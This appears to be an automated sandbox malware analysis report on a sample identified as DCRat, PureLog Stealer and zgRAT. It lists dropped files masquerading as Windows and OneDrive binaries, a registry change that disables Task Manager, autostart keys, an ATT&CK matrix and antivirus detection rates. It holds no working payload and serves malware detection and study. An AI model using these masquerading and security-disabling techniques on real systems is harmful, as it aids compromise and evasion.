                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeQueries volume information: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe VolumeInformation
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeQueries volume information: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe VolumeInformation
                        Source: C:\Users\Default\Documents\sihost.exeQueries volume information: C:\Users\Default\Documents\sihost.exe VolumeInformation
                        Source: C:\Users\Default\Documents\sihost.exeQueries volume information: C:\Users\Default\Documents\sihost.exe VolumeInformation
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeQueries volume information: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe VolumeInformation
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_001FDF1E
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001EB146 GetVersionExW,0_2_001EB146
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Disable Task Manager(disabletaskmgr)
                        Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                        Disables the Windows task manager (taskmgr)
                        Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected DCRat
                        Source: Yara matchFile source: 00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ComComponentDriverInto.exe PID: 6892, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 8.0.ComComponentDriverInto.exe.490000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.1655967326.00000000069EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000000.1944436604.0000000000492000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\Default\Documents\sihost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara matchFile source: C:\fontdriversavescrt\WmiPrvSE.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, type: DROPPED
                        Yara detected zgRAT
                        Source: Yara matchFile source: 8.0.ComComponentDriverInto.exe.490000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\Default\Documents\sihost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara matchFile source: C:\fontdriversavescrt\WmiPrvSE.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Yara detected DCRat
                        Source: Yara matchFile source: 00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ComComponentDriverInto.exe PID: 6892, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 8.0.ComComponentDriverInto.exe.490000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.1655967326.00000000069EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000000.1944436604.0000000000492000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\Default\Documents\sihost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara matchFile source: C:\fontdriversavescrt\WmiPrvSE.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, type: DROPPED
                        Yara detected zgRAT
                        Source: Yara matchFile source: 8.0.ComComponentDriverInto.exe.490000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\Default\Documents\sihost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, type: DROPPED
                        Source: Yara matchFile source: C:\fontdriversavescrt\WmiPrvSE.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information11
                        Scripting                        		Valid Accounts11
                        Windows Management Instrumentation                        		11
                        Scripting                        		1
                        DLL Side-Loading                        		31
                        Disable or Modify Tools                        		OS Credential Dumping1
                        System Time Discovery                        		1
                        Taint Shared Content                        		1
                        Archive Collected Data                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		1
                        DLL Side-Loading                        		11
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory3
                        File and Directory Discovery                        		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Exploitation for Client Execution                        		1
                        Scheduled Task/Job                        		1
                        Scheduled Task/Job                        		3
                        Obfuscated Files or Information                        		Security Account Manager37
                        System Information Discovery                        		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Command and Scripting Interpreter                        		21
                        Registry Run Keys / Startup Folder                        		21
                        Registry Run Keys / Startup Folder                        		3
                        Software Packing                        		NTDS121
                        Security Software Discovery                        		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts1
                        Scheduled Task/Job                        		Network Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets1
                        Process Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion                        		Cached Domain Credentials31
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items33
                        Masquerading                        		DCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Modify Registry                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                        Virtualization/Sandbox Evasion                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                        Process Injection                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582599 Sample: KzLetzDiM8.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 73 Suricata IDS alerts for network traffic 2->73 75 Antivirus detection for dropped file 2->75 77 Multi AV Scanner detection for dropped file 2->77 79 13 other signatures 2->79 10 KzLetzDiM8.exe 3 6 2->10         started        13 OXiaaPzsOIsoqrAHYxAVs.exe 2->13         started        16 sihost.exe 2->16         started        18 4 other processes 2->18 process3 file4 71 C:\...\ComComponentDriverInto.exe, PE32 10->71 dropped 20 wscript.exe 1 10->20         started        101 Antivirus detection for dropped file 13->101 103 Multi AV Scanner detection for dropped file 13->103 105 Machine Learning detection for dropped file 13->105 signatures5 process6 signatures7 85 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->85 87 Suspicious execution chain found 20->87 23 cmd.exe 1 20->23         started        process8 process9 25 ComComponentDriverInto.exe 10 28 23->25         started        29 reg.exe 1 1 23->29         started        31 conhost.exe 23->31         started        file10 63 C:\fontdriversavescrt\WmiPrvSE.exe, PE32 25->63 dropped 65 C:\Users\user\Desktop\rzpnRRfk.log, PE32 25->65 dropped 67 C:\Users\user\Desktop\ppTmQzAj.log, PE32 25->67 dropped 69 9 other malicious files 25->69 dropped 89 Multi AV Scanner detection for dropped file 25->89 91 Creates an undocumented autostart registry key 25->91 93 Creates multiple autostart registry keys 25->93 99 3 other signatures 25->99 33 csc.exe 4 25->33         started        37 powershell.exe 25->37         started        39 powershell.exe 25->39         started        41 19 other processes 25->41 95 Disable Task Manager(disabletaskmgr) 29->95 97 Disables the Windows task manager (taskmgr) 29->97 signatures11 process12 file13 61 C:\Windows\...\SecurityHealthSystray.exe, PE32 33->61 dropped 81 Infects executable files (exe, dll, sys, html) 33->81 43 conhost.exe 33->43         started        45 cvtres.exe 1 33->45         started        83 Loading BitLocker PowerShell Module 37->83 47 conhost.exe 37->47         started        49 WmiPrvSE.exe 37->49         started        51 conhost.exe 39->51         started        53 conhost.exe 41->53         started        55 conhost.exe 41->55         started        57 conhost.exe 41->57         started        59 18 other processes 41->59 signatures14 process15

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        KzLetzDiM8.exe51%VirustotalBrowse
                        KzLetzDiM8.exe66%ReversingLabsWin32.Trojan.Uztuby
                        KzLetzDiM8.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe100%AviraHEUR/AGEN.1323342
                        C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe100%AviraHEUR/AGEN.1323342
                        C:\Users\Default\Documents\sihost.exe100%AviraHEUR/AGEN.1323342
                        C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe100%Joe Sandbox ML
                        C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe100%Joe Sandbox ML
                        C:\Users\Default\Documents\sihost.exe100%Joe Sandbox ML
                        C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe60%VirustotalBrowse
                        C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe60%VirustotalBrowse
                        C:\Users\Default\Documents\sihost.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Users\Default\Documents\sihost.exe60%VirustotalBrowse
                        C:\Users\user\Desktop\AdxdALuR.log29%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\Desktop\AdxdALuR.log30%VirustotalBrowse
                        C:\Users\user\Desktop\IGGSkEKz.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\Desktop\IGGSkEKz.log41%VirustotalBrowse
                        C:\Users\user\Desktop\gLKxhGkC.log8%ReversingLabs
                        C:\Users\user\Desktop\gLKxhGkC.log11%VirustotalBrowse
                        C:\Users\user\Desktop\izOFSTgA.log25%ReversingLabs
                        C:\Users\user\Desktop\izOFSTgA.log35%VirustotalBrowse
                        C:\Users\user\Desktop\jwqNoTvv.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\Desktop\jwqNoTvv.log69%VirustotalBrowse
                        C:\Users\user\Desktop\ppTmQzAj.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                        C:\Users\user\Desktop\rzpnRRfk.log9%ReversingLabs
                        C:\fontdriversavescrt\ComComponentDriverInto.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\fontdriversavescrt\WmiPrvSE.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://aka.ms/pscore68powershell.exe, 00000022.00000002.2379739364.000001CD4E2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9ABE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.0000019549FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C99581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DCFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD81A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980001000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000022.00000002.2379739364.000001CD4E516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9AE06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.000001954A1F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C997A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4A3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DD1F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936F38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753588000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD83B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameComComponentDriverInto.exe, 00000008.00000002.2014307419.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2379739364.000001CD4E2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9ABE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.0000019549FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C99581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DCFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD81A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980001000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
